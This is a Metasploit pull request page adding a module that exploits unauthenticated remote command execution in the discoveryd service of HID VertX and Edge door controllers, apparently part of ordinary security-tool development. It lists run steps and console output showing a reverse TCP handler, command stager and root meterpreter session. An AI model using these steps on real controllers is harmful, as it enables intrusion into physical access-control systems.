
Add HID discoveryd command_blink_on Unauthenticated RCE exploit #10133

Merged

Conversation


bcoles commented Jun 3, 2018

Add HID discoveryd command_blink_on Unauthenticated RCE exploit.

    This module exploits an unauthenticated remote command execution
    vulnerability in the discoveryd service exposed by HID VertX and Edge
    door controllers.

    This module was tested successfully on a HID Edge model EH400
    with firmware version 2.3.1.603 (Build 04/23/2012).

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce
  • set RHOST [IP]
  • set LHOST [IP]
  • run
  • Verify you get a root session

Example Output

msf5 > use exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce 
msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > set rhosts 10.123.123.123
rhosts => 10.123.123.123
msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > set lhost 10.1.1.197
lhost => 10.1.1.197
msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > run

[*] Started reverse TCP handler on 10.1.1.197:4444 
[*] 10.123.123.123:4070 - Connecting to target
[*] Command Stager progress -   0.29% done (26/8993 bytes)
[*] Command Stager progress -   0.58% done (52/8993 bytes)
[*] Command Stager progress -   0.87% done (78/8993 bytes)
[*] Command Stager progress -   1.16% done (104/8993 bytes)
[...]
[*] Command Stager progress -  98.88% done (8892/8993 bytes)
[*] Command Stager progress -  99.17% done (8918/8993 bytes)
[*] Command Stager progress -  99.46% done (8944/8993 bytes)
[*] Command Stager progress -  99.68% done (8964/8993 bytes)
[*] Sending stage (806208 bytes) to 10.123.123.123
[*] Command Stager progress - 100.00% done (8993/8993 bytes)

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 10.123.123.123
OS           :  (Linux 2.6.28)
Architecture : armv5tejl
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter >
@bcoles bcoles added module docs labels Jun 3, 2018

bwatters-r7 commented Jun 7, 2018

I have no idea why this is failing Windows sanity tests..... @jmartin-r7 ?


bcoles commented Jun 8, 2018

@bwatters-r7 This PR was submitted while msf infrastructure was having issues. Several PRs around the same time all failed for seemingly irrelevant reasons.


jmartin-r7 commented Jun 8, 2018

Jenkins test this please.


bcoles commented Jun 26, 2018

PCAP sent


space-r7 commented Jul 6, 2018

Verified PCAP

@space-r7 space-r7 merged commit 2c0c99e into rapid7:master Jul 6, 2018
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed
space-r7 added a commit that referenced this pull request Jul 6, 2018
msjenkins-r7 added a commit that referenced this pull request Jul 6, 2018

space-r7 commented Jul 6, 2018

Release Notes

The /exploits/linux/misc/hid_discoveryd_command_blink_on_unauth_rce module has been added to the framework. It exploits an unauthenticated remote command execution vulnerability in the discoveryd service exposed by HID VertX and Edge door controllers.

@bcoles bcoles deleted the bcoles:hid_discoveryd_command_blink_on_unauth_rce branch Jul 7, 2018
@tdoan-r7 tdoan-r7 added the rn-exploit label Jul 17, 2018